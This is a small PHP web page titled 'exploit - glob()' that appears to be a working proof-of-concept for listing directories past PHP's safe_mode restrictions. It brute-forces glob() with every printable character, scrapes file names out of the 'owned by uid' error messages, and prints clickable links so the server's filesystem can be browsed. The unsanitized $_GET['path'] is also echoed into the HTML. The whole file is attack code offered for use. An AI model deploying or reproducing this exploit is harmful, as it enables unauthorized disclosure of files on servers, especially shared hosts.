<!DOCTYPE HTML public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
<title>exploit - glob()</title>
</head>
<body>
<?php
$path = realpath($_GET['path']); if (!$path) $path = '/'; if (substr($path,-1,1)!='/') $path .= '/';
echo '<b>',$path=='/'?'/':substr($path,0,strlen($path)-1),"</b><br>\n"; for($i=32;$i<127;$i++) { $param = $path.chr($i).'*';
for ($x=0;$x<11;$x++) {
@glob($param,$x); eregi('(/.*owned by uid)',$php_errormsg,$regs); $files[] = basename(substr($regs[0],0,strlen($regs[0])-13));
}
}
sort($files);
foreach (array_unique($files) as $dump) { echo '<a href="glob.php?path=',$path,$dump,'" title="',$path,$dump,'">',$dump,"</a><br>\n";
}
?>
</body>
</html>